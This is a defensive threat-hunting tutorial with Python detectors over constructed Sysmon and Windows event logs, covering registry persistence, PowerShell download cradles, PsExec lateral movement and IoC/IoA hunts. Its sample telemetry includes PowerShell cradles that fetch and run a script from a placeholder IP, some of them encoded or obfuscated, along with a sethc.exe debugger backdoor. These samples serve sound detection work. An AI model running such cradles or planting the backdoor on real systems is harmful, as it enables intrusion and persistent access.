Annual breach reports once measured the median attacker "dwell time" (how long an intruder stays in a network before being detected) at over 200 days, and recent editions still put it at days to weeks. Why so long? Because most teams rely on Passive Defense: install antivirus/EDR and "wait for the red light to blink".
Threat Hunting is Active Defense. It starts from the assumption that the breach has already happened, and it is the human-driven, proactive search for adversaries who have slipped past your automated controls without triggering an alert.
The Hunter's Mindset
A SOC Analyst works from alerts. A Threat Hunter works from data. The hunter asks: "If I were an APT actor using PowerShell to move laterally, what would that look like in the logs?" and then searches for that specific pattern, whether or not an alert ever fired.
1. The Hunting Maturity Model (HMM)
Before diving into techniques, an organization should know where it stands. The Hunting Maturity Model (HMM), originally published by Sqrrl, has five levels:
| Level | Name | Description |
|---|---|---|
| HMM0 | Initial | Relies purely on automated alerting (SIEM/AV/EDR); little routine data collection. No hunting. |
| HMM1 | Minimal | Collects logs routinely and searches them for indicators lifted from threat-intel reports; no formal hunting process. |
| HMM2 | Procedural | Follows hunting procedures written by others, run manually and repeatedly. |
| HMM3 | Innovative | Creates NEW hunting procedures from fresh intelligence and its own data analysis. |
| HMM4 | Leading | Automates successful hunts into the SIEM/EDR as detections, freeing hunters for the next hypothesis. |
2. Hypothesis-Driven Hunting
You don't just "look around". You use the Scientific Method.
- Observation: "I read a report that APT29 uses 'Sticky Keys' persistence."
- Hypothesis: "If APT29 is in my network, I will see registry modifications under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (for Sticky Keys, a Debugger value set on the sethc.exe subkey that points at cmd.exe; MITRE ATT&CK T1546.008)."
- Hunt: Query the EDR/SIEM for value changes under that key across all 5,000 endpoints.
- Validation: Did we find it? If yes -> Incident Response. If no -> the hypothesis is not supported by the data you have (for now): keep the query, note any hosts that sent no registry telemetry, and re-run it as new data arrives.
3. Hunting for Persistence (The Registry)
Attackers want to survive a reboot. The most common registry persistence is the Windows "Run" keys (MITRE ATT&CK T1547.001): anything listed there starts with the machine or with the user's logon.
3.1. The Usual Suspects
Query your EDR (CrowdStrike/SentinelOne) or SIEM (Splunk/Elastic) for new or changed values under the usual autorun keys, in both the machine and the per-user hives (Sysmon reports the per-user ones as HKU\<SID>\...):
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Then stack the values by prevalence: a command that appears on three hosts out of five thousand, or that launches from AppData, Temp or ProgramData, is the one to pull first.
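As an added example (not code from the original page), here is the IFEO hypothesis from section 2 and the Run-key hunt from this section implemented together in Python over Sysmon Event ID 13 (RegistryEvent: value set) records. It flags any Debugger value written under Image File Execution Options, rates it high when the hijacked binary is an accessibility tool such as sethc.exe, and flags Run/RunOnce values that are rare across hosts or launch from a user-writable directory. The host names, SID, paths and threshold are constructed for the example.

```python
import re
from collections import defaultdict

# Accessibility binaries the Sticky Keys family of backdoors hijacks through IFEO.
ACCESSIBILITY_BINARIES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                          "magnify.exe", "displayswitch.exe", "atbroker.exe"}

# Sysmon TargetObject patterns. IFEO lives under "Windows NT", the Run keys under "Windows".
IFEO_DEBUGGER = re.compile(r"\\Image File Execution Options\\([^\\]+)\\Debugger$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\[^\\]+$", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public)\\", re.IGNORECASE)


def hunt_registry_persistence(events, rare_host_threshold=3):
    """Flag IFEO Debugger hijacks and rare or oddly located Run/RunOnce autoruns."""
    # Pass 1: prevalence of each Run-key command across distinct hosts (stacking).
    hosts_per_command = defaultdict(set)
    for ev in events:
        if RUN_KEY.search(ev["TargetObject"]):
            hosts_per_command[ev["Details"].lower()].add(ev["host"])

    findings = []
    for ev in events:
        target, value = ev["TargetObject"], ev["Details"]
        ifeo = IFEO_DEBUGGER.search(target)
        if ifeo:
            hijacked = ifeo.group(1).lower()
            findings.append({"host": ev["host"], "technique": "IFEO Debugger hijack",
                             "severity": "high" if hijacked in ACCESSIBILITY_BINARIES else "medium",
                             "key": target, "value": value,
                             "reason": f"{hijacked} now launches {value} in its place"})
            continue
        if RUN_KEY.search(target):
            reasons = []
            prevalence = len(hosts_per_command[value.lower()])
            if prevalence < rare_host_threshold:
                reasons.append(f"rare: seen on {prevalence} host(s)")
            if USER_WRITABLE.search(value):
                reasons.append("launches from a user-writable directory")
            if reasons:
                findings.append({"host": ev["host"], "technique": "Run key autorun",
                                 "severity": "medium", "key": target, "value": value,
                                 "reason": "; ".join(reasons)})
    return findings


# Constructed Sysmon Event ID 13 records (field names as Sysmon emits them); not real telemetry.
USER_HIVE = "HKU\\S-1-5-21-1004336348-1177238915-682003330-1001"  # made-up SID
EVENTS = [
    {"host": "WS-0412", "Image": "C:\\Windows\\regedit.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                     "Image File Execution Options\\sethc.exe\\Debugger",
     "Details": "C:\\Windows\\System32\\cmd.exe"},
] + [
    # The same legitimate autorun on three hosts: common, and not from a user-writable path.
    {"host": h, "Image": "C:\\Program Files\\Microsoft OneDrive\\OneDriveSetup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"}
    for h in ("WS-0001", "WS-0002", "WS-0003")
] + [
    {"host": "WS-0099", "Image": "C:\\Users\\jdoe\\AppData\\Roaming\\svchost.exe",
     "TargetObject": USER_HIVE + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "C:\\Users\\jdoe\\AppData\\Roaming\\svchost.exe"},
    # Registry noise that is neither an IFEO nor a Run key: ignored.
    {"host": "WS-0099", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "TargetObject": USER_HIVE + "\\SOFTWARE\\Google\\Chrome\\PreferenceMACs\\Default\\extensions.settings",
     "Details": "(binary)"},
]

if __name__ == "__main__":
    for f in hunt_registry_persistence(EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['technique']}: {f['reason']}")
```

The threshold is deliberately a parameter: lowering it on a fleet of five thousand hosts surfaces more of the long tail, and the OneDrive entry above shows why prevalence alone is not a verdict, it only orders the triage queue.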
3.2. Splunk Search (SPL) Example
The SPL query for this hunt (not reproduced on this page) finds rare executables running from the AppData folder, a common malware hiding spot. Its pipeline is: select Sysmon process-creation events, keep images whose path passes through \AppData\, count the distinct hosts per image, and keep only the rare ones.
Explanation:
- EventCode=1: Sysmon process creation. The Security-log equivalent is 4688, but 4688 carries no hashes and no command line unless command-line auditing is enabled.
- regex: keeps only .exe images whose path passes through \AppData\ (Local, LocalLow and Roaming).
- where count < 5: this is the key step, and count must be the number of distinct hosts, not the number of events. Malware is rare: `Chrome.exe` runs on 5,000 machines, `Evil.exe` runs on 1, and a noisy implant that spawns 500 times on that one host should still stack as a single host. Filter for the outliers, then triage them by hand.
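The same rarity logic in Python, as an added example rather than the page's SPL: it stacks AppData executables by distinct host after stripping the per-user path prefix, so the same program under twenty different user profiles counts once per host, and a noisy implant that spawns fifty times on one host still counts as one. The events, hosts and paths are constructed.

```python
import re
from collections import defaultdict

# Any .exe launched from beneath a user's AppData tree (Local, LocalLow or Roaming).
APPDATA_EXE = re.compile(r"\\AppData\\.*\.exe$", re.IGNORECASE)
# Per-user prefix (C:\Users\<name>\) to strip so one program stacks across user names.
USER_PREFIX = re.compile(r"^[A-Z]:\\Users\\[^\\]+\\", re.IGNORECASE)


def rare_appdata_executables(events, max_hosts=5):
    """Return {normalised image path: sorted hosts} for AppData executables seen on
    fewer than max_hosts distinct hosts. Counts hosts, not events."""
    hosts_by_image = defaultdict(set)
    for ev in events:
        if ev.get("EventCode") != 1:          # Sysmon process creation only
            continue
        if not APPDATA_EXE.search(ev["Image"]):
            continue
        key = USER_PREFIX.sub("", ev["Image"]).lower()
        hosts_by_image[key].add(ev["host"])
    return {img: sorted(h) for img, h in hosts_by_image.items() if len(h) < max_hosts}


def _proc(host, image):
    return {"EventCode": 1, "host": host, "Image": image}


# Constructed Sysmon Event ID 1 sample (not real telemetry).
EVENTS = (
    # Teams runs from AppData on 20 hosts under 20 different user names: common, ignore.
    [_proc(f"WS-{n:04d}", f"C:\\Users\\user{n}\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe")
     for n in range(1, 21)]
    # A rare binary that is also noisy: 50 launches, but all on one host.
    + [_proc("WS-0412", "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\update.exe")
       for _ in range(50)]
    # A niche but legitimate tool on two hosts: rare, so it surfaces for triage.
    + [_proc("WS-0005", "C:\\Users\\user5\\AppData\\Local\\Programs\\Obsidian\\Obsidian.exe"),
       _proc("WS-0017", "C:\\Users\\user17\\AppData\\Local\\Programs\\Obsidian\\Obsidian.exe")]
    # Not under AppData: never considered.
    + [_proc("WS-0412", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")]
)

if __name__ == "__main__":
    for image, hosts in rare_appdata_executables(EVENTS).items():
        print(f"{len(hosts):>3} host(s)  {image}  {hosts}")
```

Run it against a 30-day window rather than a single day: prevalence is only meaningful once the baseline covers the whole fleet's normal software.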
4. Hunting for Lateral Movement
Once inside, attackers move. They map the network (Discovery) and work their way toward the Domain Controller (Lateral Movement).
4.1. PowerShell Hunting
PowerShell is the weapon of choice. Enable Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) by Group Policy on every workstation and server, not only the Domain Controller: 4104 is written on the host where the script runs, and lateral movement starts on a workstation. Then hunt the ScriptBlockText field for download cradles, starting with "DownloadString" and widening to Net.WebClient, Invoke-WebRequest, Invoke-Expression/IEX and FromBase64String. Two caveats: long scripts are split across several 4104 records that share a ScriptBlockId, so reassemble them before matching; and an -EncodedCommand argument appears only in the process command line (Sysmon Event ID 1 or Security 4688), so decode it there as well.
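An added Python example (not from the original page) of that hunt over constructed 4104 records and process command lines: it reassembles chunked script blocks by ScriptBlockId, strips backtick and string-concatenation obfuscation, decodes -EncodedCommand arguments (base64 of UTF-16LE), and reports which cradle markers each script contains. The hosts, script text and the 203.0.113.0/24 address are made up.

```python
import base64
import re
from collections import defaultdict

# Download-cradle and decode markers worth a second look in script block text.
CRADLE_PATTERNS = {
    "DownloadString": re.compile(r"DownloadString", re.IGNORECASE),
    "DownloadFile": re.compile(r"DownloadFile", re.IGNORECASE),
    "Net.WebClient": re.compile(r"Net\.WebClient", re.IGNORECASE),
    "Invoke-WebRequest": re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.IGNORECASE),
    "Invoke-Expression": re.compile(r"\b(Invoke-Expression|iex)\b", re.IGNORECASE),
    "FromBase64String": re.compile(r"FromBase64String", re.IGNORECASE),
}
# -e, -ec, -enc or -EncodedCommand followed by a base64 blob (PowerShell accepts any unique prefix).
ENCODED_ARG = re.compile(r"[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def normalise(script):
    """Undo two cheap signature-breakers: backtick escapes and 'Down'+'loadString' concatenation."""
    script = script.replace("`", "")
    return re.sub(r"['\"]\s*\+\s*['\"]", "", script)


def cradle_hits(text):
    text = normalise(text)
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]


def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def reassemble_script_blocks(events_4104):
    """4104 splits a long script into MessageNumber 1..MessageTotal chunks under one
    ScriptBlockId; match on the whole script, not on the chunks."""
    chunks = defaultdict(dict)
    for ev in events_4104:
        chunks[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev
    blocks = {}
    for sbid, parts in chunks.items():
        ordered = [parts[n] for n in sorted(parts)]
        blocks[sbid] = {"host": ordered[0]["host"],
                        "text": "".join(p["ScriptBlockText"] for p in ordered)}
    return blocks


def find_download_cradles(events_4104, process_events):
    findings = []
    for sbid, blk in reassemble_script_blocks(events_4104).items():
        hits = cradle_hits(blk["text"])
        if hits:
            findings.append({"host": blk["host"], "source": "4104", "id": sbid, "hits": hits})
    for ev in process_events:
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded:
            hits = cradle_hits(decoded)
            if hits:
                findings.append({"host": ev["host"], "source": "cmdline", "id": ev["ProcessId"],
                                 "hits": hits, "decoded": decoded})
    return findings


# Constructed sample telemetry.
SCRIPT_BLOCK_EVENTS = [
    # One script split over two 4104 records: neither chunk alone contains "Net.WebClient".
    {"host": "WS-0412", "ScriptBlockId": "a1", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": "$c = New-Object Net.Web"},
    {"host": "WS-0412", "ScriptBlockId": "a1", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": "Client; $c.DownloadString('http://203.0.113.10/b.ps1')"},
    {"host": "WS-0007", "ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Windows\\Temp | Remove-Item -Force"},
    # Backtick and concatenation obfuscation of the same cradle.
    {"host": "WS-0019", "ScriptBlockId": "c3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "$w=New-Object Net.Web`Client; I`EX $w.('Down'+'loadString')('http://203.0.113.10/c')"},
]
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
PROCESS_EVENTS = [
    {"host": "WS-0412", "ProcessId": 4120, "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "WS-0007", "ProcessId": 2216,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for f in find_download_cradles(SCRIPT_BLOCK_EVENTS, PROCESS_EVENTS):
        print(f"{f['host']} {f['source']}:{f['id']} -> {', '.join(f['hits'])}")
```

The marker list is a starting point, not a verdict: administrative scripts download things too, so rank results by how many markers co-occur with a hidden window, -nop, or an encoded command before opening a ticket.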
4.2. PsExec & SMB
PsExec (Sysinternals) copies PSEXESVC.exe to the target's ADMIN$ share, installs it as a service, and talks to it over a named pipe. Each step leaves a record: Security 5145 (a network share object was checked for access; it names the share, the file, the account and the client IP, e.g. ADMIN$ and PSEXESVC.exe, then IPC$ and the PSEXESVC pipe), System 7045 (a new service was installed; Security 4697 if service-install auditing is on), and Sysmon 17/18 (named pipe created/connected). 5140 only records that a share was accessed, without the file name, and 5145 is written only if the Detailed File Share audit subcategory is enabled.
IoA (Indicator of Attack): a service being created on a host seconds after a file was written to its admin share from a remote address. Renaming PsExec or swapping in a clone does not change that sequence.
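As an added example (not code from the original page), the IoA above as a per-host correlation in Python: a Security 5145 with WriteData (0x2) in the access mask against ADMIN$ or C$, followed within a window by a System 7045 whose service binary has the same file name, is rated high and tagged with the writer's account and source IP; a 7045 whose service name merely looks like PsExec's falls back to medium. The hosts, accounts, addresses and times are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

EXE_NAME = re.compile(r'([^\\/"]+\.exe)', re.IGNORECASE)
# Service-name prefixes registered by PsExec-style tools (PsExec: PSEXESVC, PAExec: PAExec-<pid>-<host>).
REMOTE_EXEC_SERVICE_PREFIXES = ("psexesvc", "paexec")


def exe_name(path):
    """'%SystemRoot%\\PSEXESVC.exe' and 'PSEXESVC.exe' both become 'psexesvc.exe'."""
    m = EXE_NAME.search(path)
    return m.group(1).lower() if m else path.lower()


def hunt_remote_service_install(events, window_seconds=120):
    """Correlate, per host, a write to ADMIN$/C$ (Security 5145 with WriteData in the
    access mask) with a service install (System 7045) of that same file within the window."""
    by_host = defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: e["time"])
        drops = [e for e in evs
                 if e["EventID"] == 5145
                 and e["ShareName"].upper().endswith(("ADMIN$", "C$"))
                 and int(e["AccessMask"], 16) & 0x2]
        for svc in (e for e in evs if e["EventID"] == 7045):
            image = exe_name(svc["ImagePath"])
            earliest = svc["time"] - timedelta(seconds=window_seconds)
            matched = [d for d in drops
                       if earliest <= d["time"] <= svc["time"]
                       and exe_name(d["RelativeTargetName"]) == image]
            if matched:
                drop = matched[-1]
                findings.append({"host": host, "severity": "high", "service": svc["ServiceName"],
                                 "image": image, "written_by": drop["SubjectUserName"],
                                 "source_ip": drop["IpAddress"],
                                 "reason": "service binary written to admin share from remote host, then installed"})
            elif svc["ServiceName"].lower().startswith(REMOTE_EXEC_SERVICE_PREFIXES):
                findings.append({"host": host, "severity": "medium", "service": svc["ServiceName"],
                                 "image": image, "reason": "known remote-execution service name"})
    return findings


# Constructed sample: Security 4624/5145 and System 7045 records from three hosts.
T0 = datetime(2024, 3, 4, 9, 12, 0)
EVENTS = [
    # SRV-FILE01: the PsExec sequence. Network logon, file dropped on ADMIN$, service installed, pipe opened on IPC$.
    {"host": "SRV-FILE01", "EventID": 4624, "time": T0, "LogonType": 3,
     "SubjectUserName": "svc_backup", "IpAddress": "10.0.5.23"},
    {"host": "SRV-FILE01", "EventID": 5145, "time": T0 + timedelta(seconds=2),
     "SubjectUserName": "svc_backup", "IpAddress": "10.0.5.23", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "PSEXESVC.exe", "AccessMask": "0x2"},
    {"host": "SRV-FILE01", "EventID": 7045, "time": T0 + timedelta(seconds=3),
     "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    {"host": "SRV-FILE01", "EventID": 5145, "time": T0 + timedelta(seconds=4),
     "SubjectUserName": "svc_backup", "IpAddress": "10.0.5.23", "ShareName": "\\\\*\\IPC$",
     "RelativeTargetName": "PSEXESVC", "AccessMask": "0x12019f"},
    # SRV-APP02: a service installed by a local admin at the console; no admin-share write preceded it.
    {"host": "SRV-APP02", "EventID": 7045, "time": T0 + timedelta(minutes=5),
     "ServiceName": "Sysmon64", "ImagePath": "C:\\Windows\\Sysmon64.exe", "AccountName": "LocalSystem"},
    # WS-0031: a file copied to ADMIN$ by software deployment, but no service created from it.
    {"host": "WS-0031", "EventID": 5145, "time": T0 + timedelta(minutes=7),
     "SubjectUserName": "sccm_push", "IpAddress": "10.0.1.9", "ShareName": "\\\\*\\ADMIN$",
     "RelativeTargetName": "Temp\\inventory.exe", "AccessMask": "0x2"},
]

if __name__ == "__main__":
    for f in hunt_remote_service_install(EVENTS):
        print(f"[{f['severity']}] {f['host']} service {f['service']} ({f['image']}): {f['reason']}")
```

Whitelist your deployment tools' accounts and source addresses (the sccm_push style entry above) before turning this into an alert, otherwise every patch cycle looks like lateral movement.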
5. Indicators of Compromise (IoC) vs Indicators of Attack (IoA)
This is a crucial distinction for hunters.
- IoC (static): "The file hash is a1b2c3...". Useful but brittle: if the attacker recompiles or changes a single byte, the hash changes. Hashes sit at the bottom of the Pyramid of Pain; IP addresses and domains are only slightly harder for an adversary to rotate.
- IoA (behavioral): "winword.exe spawned powershell.exe". This is resilient. It doesn't matter what the hash is: Word has no business launching a shell, and the tools, tactics and procedures at the top of the pyramid are the most expensive things for an adversary to change.
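An added Python example (not from the original page) that puts the two side by side over the same constructed Sysmon Event ID 1 records: an IoC hunt that matches a blocklisted SHA256, and an IoA hunt that matches an Office parent spawning a shell/LOLBin or an executable from a user-writable directory. The recompiled dropper slips past the hash, not past the behaviour. Hosts, paths and hashes are made up.

```python
import ntpath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS_AND_LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                      "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def image_name(path):
    return ntpath.basename(path.strip('"')).lower()


def ioc_hits(events, bad_sha256):
    """IoC hunt: a process image whose SHA256 is on the blocklist."""
    wanted = {h.lower() for h in bad_sha256}
    return [ev for ev in events if ev["SHA256"].lower() in wanted]


def ioa_hits(events):
    """IoA hunt: an Office application spawning a shell/LOLBin, or any executable
    from a user-writable directory, whatever its hash."""
    hits = []
    for ev in events:
        if image_name(ev["ParentImage"]) not in OFFICE_APPS:
            continue
        child, child_path = image_name(ev["Image"]), ev["Image"].lower()
        if child in SHELLS_AND_LOLBINS or any(d in child_path for d in USER_WRITABLE):
            hits.append(ev)
    return hits


def _proc(host, parent, image, sha256):
    return {"host": host, "ParentImage": parent, "Image": image, "SHA256": sha256}


# Constructed sample. The hashes are placeholders in the page's "a1b2c3..." style, not real digests.
WINWORD = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
POWERSHELL = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
KNOWN_BAD = {"a1b2c3d4" * 8}   # the dropper hash from last week's incident report
EVENTS = [
    # The dropper exactly as first seen: both hunts catch it.
    _proc("WS-0412", WINWORD, "C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.exe", "a1b2c3d4" * 8),
    # Same dropper, recompiled: the hash no longer matches, the behaviour still does.
    _proc("WS-0099", WINWORD, "C:\\Users\\asmith\\AppData\\Local\\Temp\\invoice.exe", "e5f6a7b8" * 8),
    # A macro launching PowerShell: the child is a signed Microsoft binary, so no hash will ever flag it.
    _proc("WS-0019", WINWORD, POWERSHELL, "c0ffee00" * 8),
    # An administrator opening PowerShell from the desktop: not an Office parent.
    _proc("WS-0007", "C:\\Windows\\explorer.exe", POWERSHELL, "c0ffee00" * 8),
    # Word spawning its print helper: Office parent, but a benign child in a system directory.
    _proc("WS-0007", WINWORD, "C:\\Windows\\splwow64.exe", "d00d1e00" * 8),
]

if __name__ == "__main__":
    print("IoC:", [e["host"] for e in ioc_hits(EVENTS, KNOWN_BAD)])
    print("IoA:", [e["host"] for e in ioa_hits(EVENTS)])
```

The IoC list is still worth running, since a hash hit is a near-certain confirmation; the IoA rule is what finds the variant you have not seen yet.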
6. YARA Rules: Custom Hunting
YARA is "RegEx for binaries": you write a rule made of strings plus a condition, and scan files or process memory for it.
If you find a suspicious file that your AV missed, write a YARA rule from strings unique to it (a mutex name, a hard-coded C2 path, an odd PDB path), not the generic library strings every program carries; test the rule against a clean corpus so it doesn't fire fleet-wide; then scan your entire fleet. You might find 5 more infections.
Key Takeaway
Threat Hunting is a loop. You hunt -> you find something -> you turn the finding into a rule that detects it automatically -> you move on to the next hypothesis. Automate the known; hunt the unknown.